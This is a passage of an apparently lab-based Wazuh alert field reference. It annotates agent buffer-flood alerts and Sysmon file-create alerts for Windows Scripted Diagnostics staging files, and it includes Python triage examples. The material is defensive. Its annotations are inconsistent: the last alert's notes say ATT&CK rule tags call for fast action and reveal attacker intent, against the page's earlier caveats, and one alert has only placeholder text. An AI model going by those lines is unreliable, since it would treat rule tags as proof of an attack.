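    return cur != previous_result


if __name__ == "__main__":
    for label, out in (("42 days", sample_net_accounts("42")),
                       ("never expires", sample_net_accounts("Unlimited")),
                       ("timed out", None)):
        res = evaluate_check(out)
        print(f"{label:14} -> {res['result']}  drift from passed? {is_drift('passed', res)}")
```

Running it on a Windows host with `run_net_accounts()` in place of the samples reproduces the agent's check; the point of `is_drift` is that the page's passed-to-not-applicable transition returns False, so an automated ticketing rule built on previous_result does not file a password-policy regression for a hung command.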
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533961.531836 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full State of the agent's client buffer, reported by its anti-flooding mechanism: full means the buffer reached its configured queue_size and incoming events are being dropped until it drains. This is not a severity field. Fix the cause (on this host the Sysmon file-create volume is the first thing to inspect) or raise queue_size / events_per_second under <client_buffer> in the agent's ossec.conf.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533975.532081 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Buffer state: flooded means the buffer is still full and the agent keeps discarding events. Expect gaps in this agent's Sysmon timeline until the back-to-normal message (rule 205) arrives, and note that the SCA check on the same host timed out a few seconds earlier, so check host load as well. Tuning lives under <client_buffer> (queue_size, events_per_second) in the agent's ossec.conf.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] ATT&CK technique IDs the rule author attached to describe what the rule hunts for, not what this event proves. T1105 (Ingress Tool Transfer) here rests only on a .ps1 appearing in Temp; nothing in the event shows a remote origin. Use the IDs to pivot, then decide on the eventdata.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK tactic behind each ID, i.e. the goal the technique would serve. Same caveat: a rule tag, not evidence.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Names of the IDs above.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.532353 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Microsoft-Windows-Sysmon means this is a Sysmon record, so read eventID against Sysmon's own list (1 process create, 3 network connection, 11 file create), not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of that provider; the exact-match key to filter on when provider names are ambiguous.
data.win.system.eventID: 11 Event ID within this provider. Sysmon 11 is FileCreate: a file was created or overwritten; who wrote it and where are in the eventdata fields below.
data.win.system.version: 2 Schema version of this event type; only matters when a parser breaks after a Sysmon upgrade.
data.win.system.level: 4 Numeric severity: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon telemetry is always 4, so level says nothing about how suspicious the event is.
data.win.system.task: 11 Task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1079756Z When the record was written to the channel, UTC with 100 ns resolution. Written 17 April, alerted 24 April (alert id 1745533981): the same late or replayed batch as the other Sysmon events on this page, not live activity.
data.win.system.eventRecordID: 215891 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the record, i.e. the Sysmon service, not the process described in the event; that one is eventdata.processId.
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel holding the record. Query it on the host (Event Viewer, or wevtutil qe Microsoft-Windows-Sysmon/Operational) for neighbouring events the agent did not forward.
data.win.system.computer: Attacker Hostname stamped by the event log itself. It should equal agent.name; a mismatch means the agent is forwarding another machine's log.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.099
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\CL_Utility.ps1
CreationUtcTime: 2025-04-17 16:47:59.099
User: Attacker\Attcker1" Rendered Sysmon message; the same values are split into the data.win.eventdata.* fields below. taskhostw.exe (PID 8224) created CL_Utility.ps1 inside a fresh C:\Windows\Temp\SDIAG_<guid>\ folder. That folder name and file set (CL_Utility.ps1, DiagPackage.dll, RS_*.ps1, all written within a few ms by the same ProcessGuid in the alerts that follow) is how Windows Scripted Diagnostics stages a troubleshooting pack before running it, and the Scheduled Maintenance pack under C:\Windows\diagnostics\scheduled\Maintenance\ ships these same file names. The rule fires because a .ps1 landed in Windows\Temp, which is also what a scripted drop looks like, so close it by hashing the dropped files against that folder and confirming the \Microsoft\Windows\Diagnosis\Scheduled task ran at this time.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.099 Sysmon's own timestamp for the file operation (UTC, millisecond); systemTime is the slightly later write to the log.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} Sysmon's unique ID for the creating process. It survives PID reuse, so it is the key for pivoting to this process's event ID 1 (parent, command line) and for grouping the other SDIAG_ file writes on this page that share it.
data.win.eventdata.processId: 8224 PID of the creating process at the time. PIDs are reused; correlate on processGuid instead.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe Host process for scheduled tasks implemented as DLLs. A signed system binary writing scripts is also what a living-off-the-land drop looks like, so identify the task: event ID 1 for this processGuid, or the Task Scheduler operational log (events 200/201) around 16:47:59 UTC. The doubled backslashes are JSON escaping, not part of the path.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\CL_Utility.ps1 Full path of the created file; the rule matched on the .ps1 extension under C:\Windows\Temp. SDIAG_<guid> is the Scripted Diagnostics staging folder; compare this file's hash with C:\Windows\diagnostics\scheduled\Maintenance\CL_Utility.ps1.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.099 Creation timestamp now on the file. Equal to utcTime, so a new file rather than an overwrite or a backdated one.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as, DOMAIN\user; the domain part equals the hostname, so a local account. It ran as the user rather than SYSTEM; check that against the task's configured principal.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] ATT&CK ID the rule attaches to any executable dropped under C:\Windows. Lateral Tool Transfer implies the file came from another host, which nothing here shows: the writer is the local taskhostw.exe. Treat the tag as the rule's category and establish the file's origin from the eventdata.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK tactic for that ID; a rule tag, not evidence that lateral movement happened.
rule.mitre.technique: ['Lateral Tool Transfer'] Name of the ID above.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.534988 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; a Sysmon record, so eventID is a Sysmon ID (11 = file create), not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of that provider; exact-match filter key.
data.win.system.eventID: 11 Sysmon FileCreate: a file was created or overwritten; writer and path are in the eventdata fields below.
data.win.system.version: 2 Schema version of this event type; only matters when a parser breaks after a Sysmon upgrade.
data.win.system.level: 4 Numeric severity (4 = Informational). Sysmon telemetry is always 4, so it says nothing about how suspicious the event is.
data.win.system.task: 11 Task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1250326Z When the record was written to the channel, UTC. 17 ms after the CL_Utility.ps1 event from the same process, and a week before the alert id (1745533981 = 24 April): the same late or replayed batch as the other Sysmon events on this page.
data.win.system.eventRecordID: 215897 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the event (that is eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel holding the record; query it on the host for neighbouring events the agent did not forward.
data.win.system.computer: Attacker Hostname stamped by the event log itself; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.123
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\DiagPackage.dll
CreationUtcTime: 2025-04-17 16:47:59.123
User: Attacker\Attcker1" Rendered Sysmon message. Same ProcessGuid and PID as the CL_Utility.ps1 event 24 ms earlier (record 215891 versus 215897), so this is the same staging operation; DiagPackage.dll is the compiled component of a Scripted Diagnostics troubleshooting pack. The rule fires on any executable written under C:\Windows; check the DLL's hash or Authenticode signature against C:\Windows\diagnostics\scheduled\Maintenance\DiagPackage.dll before treating it as a drop.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.123 Sysmon's own timestamp for the file operation (UTC, millisecond).
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} Sysmon's unique ID for the creating process; identical to the CL_Utility.ps1 and RS_*.ps1 events on this page, which is how you know they are one operation.
data.win.eventdata.processId: 8224 PID at the time; PIDs are reused, so correlate on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe Host process for scheduled tasks implemented as DLLs; identify the task via event ID 1 for this processGuid or the Task Scheduler operational log. Doubled backslashes are JSON escaping.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\DiagPackage.dll Full path of the created file; the rule matched on a .dll under C:\Windows. A DLL in a world-writable Temp folder deserves a hash check: the genuine copy lives at C:\Windows\diagnostics\scheduled\Maintenance\DiagPackage.dll and is Microsoft-signed.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.123 Equal to utcTime, so a new file rather than an overwrite.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as; a local account on host Attacker.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] ATT&CK technique IDs the rule author attached to describe what the rule hunts for, not what this event proves; nothing here shows a remote origin for the file. Pivot on them, then decide on the eventdata.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK tactic behind each ID; a rule tag, not evidence.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Names of the IDs above.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.537612 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; a Sysmon record, so eventID is a Sysmon ID (11 = file create), not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of that provider; exact-match filter key.
data.win.system.eventID: 11 Sysmon FileCreate: a file was created or overwritten; writer and path are in the eventdata fields below.
data.win.system.version: 2 Schema version of this event type; only matters when a parser breaks after a Sysmon upgrade.
data.win.system.level: 4 Numeric severity (4 = Informational). Sysmon telemetry is always 4, so it says nothing about how suspicious the event is.
data.win.system.task: 11 Task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1316901Z When the record was written to the channel, UTC. 7 ms after the DiagPackage.dll event from the same process, and a week before the alert id (1745533981 = 24 April): the same late or replayed batch as the other Sysmon events on this page.
data.win.system.eventRecordID: 215898 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the event (that is eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel holding the record; query it on the host for neighbouring events the agent did not forward.
data.win.system.computer: Attacker Hostname stamped by the event log itself; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.128
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_AdminDiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.128
User: Attacker\Attcker1" Rendered Sysmon message. Same process as the CL_Utility.ps1 and DiagPackage.dll events, 5 ms after the DLL. In a Scripted Diagnostics pack the prefixes mean something: CL_ common library, TS_ troubleshooter, RS_ resolver, so RS_AdminDiagnosticHistory.ps1 is the pack's resolver for clearing diagnostic history, and the Scheduled Maintenance pack under C:\Windows\diagnostics\scheduled\Maintenance\ contains it. Hash-compare as with the other files; one verification covers the whole SDIAG_ folder.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.128 Sysmon's own timestamp for the file operation (UTC, millisecond).
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} Sysmon's unique ID for the creating process; shared with the other SDIAG_ file writes on this page, so they are one operation.
data.win.eventdata.processId: 8224 PID at the time; PIDs are reused, so correlate on processGuid.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe Host process for scheduled tasks implemented as DLLs; identify the task via event ID 1 for this processGuid or the Task Scheduler operational log. Doubled backslashes are JSON escaping.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_AdminDiagnosticHistory.ps1 Full path of the created file; the rule matched on the .ps1 extension under C:\Windows\Temp. Compare with C:\Windows\diagnostics\scheduled\Maintenance\RS_AdminDiagnosticHistory.ps1.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.128 Equal to utcTime, so a new file rather than an overwrite.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as; a local account on host Attacker.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
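The two kinds of Sysmon event ID 11 alert on this page (PowerShell's __PSScriptPolicyTest probe from the first alert, and the SDIAG_ staging writes from taskhostw.exe in the alerts above) call for the same triage steps: recognise the known-benign file, never auto-close a diagnostics staging folder without checking it against the genuine pack, and group the writes by ProcessGuid so one process is judged once. The following is an added example, not code from this page or from Wazuh. It runs those steps over copies of the eventdata values shown above plus one constructed unknown; the verdict labels, the regexes and the comparison path C:\Windows\diagnostics\scheduled\Maintenance are the example's own choices.

```python
"""Triage Sysmon event ID 11 (FileCreate) alerts of the kinds shown above.

Added example, not code from the page or from Wazuh. It applies three checks to
copies of the eventdata fields on this page (plus one constructed unknown):
is the file PowerShell's own policy-probe artefact, is it a Scripted
Diagnostics staging folder that must be verified against the genuine pack,
and which events belong to the same process (ProcessGuid).
"""
import re
from collections import defaultdict

GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# PowerShell writes this file at start-up to test AppLocker/WDAC script enforcement.
PS_POLICY_PROBE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\__psscriptpolicytest_[a-z0-9.]+\.ps1$")
# Windows Scripted Diagnostics stages a troubleshooting pack here before running it.
SDIAG_STAGING = re.compile(r"^[a-z]:\\windows\\temp\\sdiag_" + GUID + r"\\[^\\]+$")
# Processes that legitimately stage such packs; the page shows the scheduled (taskhostw) path.
DIAG_HOSTS = ("\\taskhostw.exe", "\\msdt.exe", "\\sdiagnhost.exe")
# Genuine Scheduled Maintenance pack to hash the dropped files against (assumed location).
MAINTENANCE_PACK = r"C:\Windows\diagnostics\scheduled\Maintenance"

# Values copied from the alerts above (Wazuh's JSON doubles the backslashes);
# the last entry is constructed to show the fall-through case.
ALERTS = [
    {"eventRecordID": 213065, "processGuid": "{94294ddc-2e5b-6801-fa07-000000000e00}",
     "image": r"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "targetFilename": r"C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vmq431i2.0u4.ps1"},
    {"eventRecordID": 215891, "processGuid": "{94294ddc-4855-6800-0605-000000000e00}",
     "image": r"C:\\WINDOWS\\system32\\taskhostw.exe",
     "targetFilename": r"C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\CL_Utility.ps1"},
    {"eventRecordID": 215897, "processGuid": "{94294ddc-4855-6800-0605-000000000e00}",
     "image": r"C:\\WINDOWS\\system32\\taskhostw.exe",
     "targetFilename": r"C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\DiagPackage.dll"},
    {"eventRecordID": 215898, "processGuid": "{94294ddc-4855-6800-0605-000000000e00}",
     "image": r"C:\\WINDOWS\\system32\\taskhostw.exe",
     "targetFilename": r"C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_AdminDiagnosticHistory.ps1"},
    # constructed: an unknown script dropped by cmd.exe, not taken from the page
    {"eventRecordID": 215950, "processGuid": "{00000000-0000-0000-0000-000000000001}",
     "image": r"C:\\Windows\\System32\\cmd.exe",
     "targetFilename": r"C:\\Users\\Attcker1\\AppData\\Local\\Temp\\update.ps1"},
]

RANK = {"expected": 0, "verify": 1, "review": 2}   # worst verdict wins per process


def unescape(path):
    """Undo the JSON escaping Wazuh applies to backslashes."""
    return path.replace("\\\\", "\\")


def classify(alert):
    """Return (verdict, reason); verdict is one of expected, verify, review."""
    image = unescape(alert["image"]).lower()
    target = unescape(alert["targetFilename"]).lower()
    if image.endswith("\\powershell.exe") and PS_POLICY_PROBE.match(target):
        return "expected", "PowerShell AppLocker/WDAC policy probe; look at why powershell.exe started instead"
    if SDIAG_STAGING.match(target):
        if image.endswith(DIAG_HOSTS):
            # An abused troubleshooter stages files the same way, so never call this expected.
            return "verify", f"Scripted Diagnostics staging; hash against {MAINTENANCE_PACK} and find the launching task"
        return "review", "SDIAG_ staging folder written by a process that is not a diagnostics host"
    return "review", "no known-benign pattern matched"


def by_process(alerts):
    """Group alerts by ProcessGuid in channel write order (eventRecordID)."""
    groups = defaultdict(list)
    for a in alerts:
        groups[a["processGuid"]].append(a)
    return {g: sorted(evs, key=lambda a: a["eventRecordID"]) for g, evs in groups.items()}


def triage(alerts):
    """One summary per process, carrying the worst verdict among its files."""
    rows = []
    for guid, events in by_process(alerts).items():
        verdict, reason = max((classify(a) for a in events), key=lambda v: RANK[v[0]])
        rows.append({
            "processGuid": guid,
            "image": unescape(events[0]["image"]),
            "verdict": verdict,
            "reason": reason,
            "files": [unescape(a["targetFilename"]).rsplit("\\", 1)[-1] for a in events],
            "records": (events[0]["eventRecordID"], events[-1]["eventRecordID"]),
        })
    return rows


if __name__ == "__main__":
    for row in triage(ALERTS):
        print(f'{row["verdict"]:8} {row["image"]}  {row["files"]}  {row["reason"]}')
```

Grouping by ProcessGuid collapses the three SDIAG_ alerts (rule 92200 twice and rule 92217 once) into a single item to verify, which is how they should be worked; the constructed cmd.exe entry shows that anything outside the two known patterns stays at review rather than being quietly absorbed.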
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] ATT&CK technique IDs the rule author attached to describe what the rule hunts for, not what this event proves; nothing here shows a remote origin for the file. Pivot on them, then decide on the eventdata.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK tactic behind each ID; a rule tag, not evidence.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Names of the IDs above.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.540307 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event; a Sysmon record, so eventID is a Sysmon ID (11 = file create), not a Security-log ID.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of that provider; exact-match filter key.
data.win.system.eventID: 11 Sysmon FileCreate: a file was created or overwritten; writer and path are in the eventdata fields below.
data.win.system.version: 2 Schema version of this event type; only matters when a parser breaks after a Sysmon upgrade.
data.win.system.level: 4 Numeric severity (4 = Informational). Sysmon telemetry is always 4, so it says nothing about how suspicious the event is.
data.win.system.task: 11 Task category; for Sysmon it mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1463736Z When the record was written to the channel, UTC. 15 ms after the RS_AdminDiagnosticHistory.ps1 event from the same process, and a week before the alert id (1745533981 = 24 April): the same late or replayed batch as the other Sysmon events on this page.
data.win.system.eventRecordID: 215900 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process in the event (that is eventdata.processId).
data.win.system.threadID: 4740 Thread in the Sysmon service that wrote the record. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel holding the record; query it on the host for neighbouring events the agent did not forward.
data.win.system.computer: Attacker Hostname stamped by the event log itself; should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.145
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_MachineWERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.145
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.145 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_MachineWERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.145 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
